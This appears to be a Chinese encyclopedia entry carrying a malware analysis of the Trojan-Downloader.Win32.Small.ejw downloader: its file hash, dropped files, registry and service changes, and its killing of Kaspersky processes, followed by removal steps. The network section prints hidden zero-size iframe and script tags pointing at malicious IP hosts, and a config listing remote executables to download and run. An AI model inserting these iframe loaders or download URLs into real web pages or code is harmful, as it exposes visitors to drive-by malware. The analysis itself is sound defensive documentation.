词条 | Trojan-Downloader.Win32.Small.ejw |
释义 | Trojan-Downloader.Win32.Small.ejw病毒属木马类,病毒伪装微软版本信息,用以迷惑用户。病毒运行后衍生病毒文件到系统目录下,连接网络下载病毒文件,修改注册表,创建服务,并以服务的方式达到随机启动的目的,删除系统正常服务。尝试结束卡巴斯基进程。 病毒标签病毒名称: Trojan-Downloader.Win32.Small.ejw 病毒类型: 木马 文件 MD5: 216221B8289779DAAB7405089391684F 公开范围: 完全公开 危害等级: 4 文件长度: 19,788 字节 感染系统: windows98以上版本 开发工具: Microsoft Visual C++ 6.0 加壳类型: Xtreme-Protector v1.05 行为分析1 、衍生病毒文件到系统目录下: %system32%\\d26bf5b8.dll %system32%\\d26bf5b8.exe %system32%\\d26bf5b8t.exe 2 、修改注册表: HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\D26BF5B8\\ImagePath 值 : 字符串: "C:\\WINDOWS\\system32\\D26BF5B8.EXE -service" 3 、开启服务: 服务名称: D26BF5B8 显示名称: D26BF5B8 描述: D26BF5B8 可执行文件的路径: C:\\WINDOWS\\system32\\D26BF5B8.EXE 启动方式:自动 4 、关闭系统正常服务 ERSVC: HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\ERSvc 键值 : 字串: "Description"="服务和应用程序在非标准环境下运行时允许错误报告" 5 、连接网络: <script language="javascript" src="http://count6.51yes.com/click.aspx?id=63610940&logo=1"></script> <iframe height="0" width="0" src="http://59.34.197.164:81/808080/ad2881.asp"></iframe> <iframe height="0" width="0" src="http://59.34.197.164:81/80444/ad2715fg.asp"></iframe> <iframe height="0" width="0" src="http://www.sxrf.gov.cn"></iframe> <iframe height="0" width="0" src="http://59.34.197.164:81/88888/ad56d.asp"></iframe> <iframe height="0" width="0" src="http://www.gansusteel.com"></iframe> <iframe height="0" width="0" src="http://www.east128.com/about.asp"></iframe> <iframe height="0" width="0" src="http://dongman.0937.net"></iframe> <iframe height="0" width="0" src="http://suremo.cn"></iframe> <iframe height="0" width="0" src="http://www.jkdj.cn"></iframe> <iframe height="0" width="0" src="http://www.cnkmd.com"></iframe> <iframe height="0" width="0" src="http://www.xinwanyu.com"></iframe> <iframe height="0" width="0" src="http://hejianwu.com"></iframe> <iframe height="0" width="0" src="http://59.34.197.164:81/80465551/ad28781.asp"> /iframe> <iframe height="0" width="0" src="http://59.34.197.164:81/808080/ad2881.asp"></iframe> <iframe src='http://59.34.197.239/in.asp?newwebname=1' width='0' height='0' frameborder='0'></iframe> <script language="javascript" src="http://59.34.197.239/in.js"></script> 6 、该木马有盗取用户敏感信息的功能,连接网络,下载病毒文件到本机运行: [update] ver=0 url=http://127.0.0.1/ timer=1 [startpage] startpage=0 url=http://www.sina.com.cn1 [favorites] favorites=0 count=0 [desktop] desktop=0 count=0 [popwin] popwin=0 count=0 [addrpop] addrpop=0 [alexa] alexa=1 fileurl=http://www.al*x*.com/1.exe url1=http://nba.9*6*k.com/2.htm url2=http://5*.3*.1*7.1*4:81/808080/ad2881.asp rl3=http://5*.3*.1*7.1*4:81/80444/ad2715fg.asp url4=http://5*.3*.1*7.1*4:81/8046338888/ad285367.asp url5=http://5*.3*.1*7.1*4:81/8046555/ad2878.asp url6=http://5*.3*.1*7.1*4:81/80444/ad2715.asp url7=http://www.u**s*e.com/top.html url8=http://www.it*o*ns.com url9=http://www.j*d*.cn url10=http://www.*x*f.gov.cn url11=http://www.g*ns*st*el.com url12=http://5*.3*.1*7.1*4:81/88888/ad56d.asp url13=http://www.y*h*l*ng.com url14=http://5*.3*.1*7.1*4:81/8046222/ad2714.asp url15=http://5*.3*.1*7.1*4:81/80465551/ad28781.asp count=15 [im] im=0 msg= 你好啊,兄弟! http://www.s*n*.com.cn qq=0 popo=0 uc=0 taobao=0 [file] file=1 file1=http://www.t*o1*81*8.com/mh.exe filename1=sthu1.exe file2=http://h&inf*lm.cn/obug.exe filename2=sthu2.exe file3=http://www.t*o1*81*8.com/qq.exe filename3=sthu3.exe file4=http://imgbbs.sh*ngd*.com/bbs.shangdu.com/3/227/464355/file/gz.exe filename4=sthu4.exe file5=http://www.t*o1*81*8.com/12.exe filename5=sthu5.exe file6=http://www.y*-m*ng.com/bbs/geawe/fsgd/treter/1.exe filename6=sthu6.exe file7=http://www.t*o1*81*8.com/yk.exe filename7=sthu7.exe file8=http://jd.54l*um*ng.com/lm/one.exe filename8=sthu8.exe count=8 [count] count=1 mecount=1 url=http://nba.9*6*k.com/lm/count/count.asp 7 、该病毒尝试关闭卡巴斯基进程。 注: % System%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\\Winnt\\System32,windows95/98/me中默认的安装路径是C:\\Windows\\System,windowsXP中默认的安装路径是C:\\Windows\\System32。 清除方案1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 ) 2 、 手工清除请按照行为分析删除对应文件,恢复相关系统设置。 (1) 使用 安天木马防线 “进程管理”关闭病毒进程 终止所有IE进程 (2) 删除病毒文件 %system32%\\d26bf5b8.dll %system32%\\d26bf5b8.exe %system32%\\d26bf5b8t.exe (3) 恢复病毒修改的注册表项目,删除病毒添加的注册表项 终止服务D26BF5B8 |
随便看 |
|
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。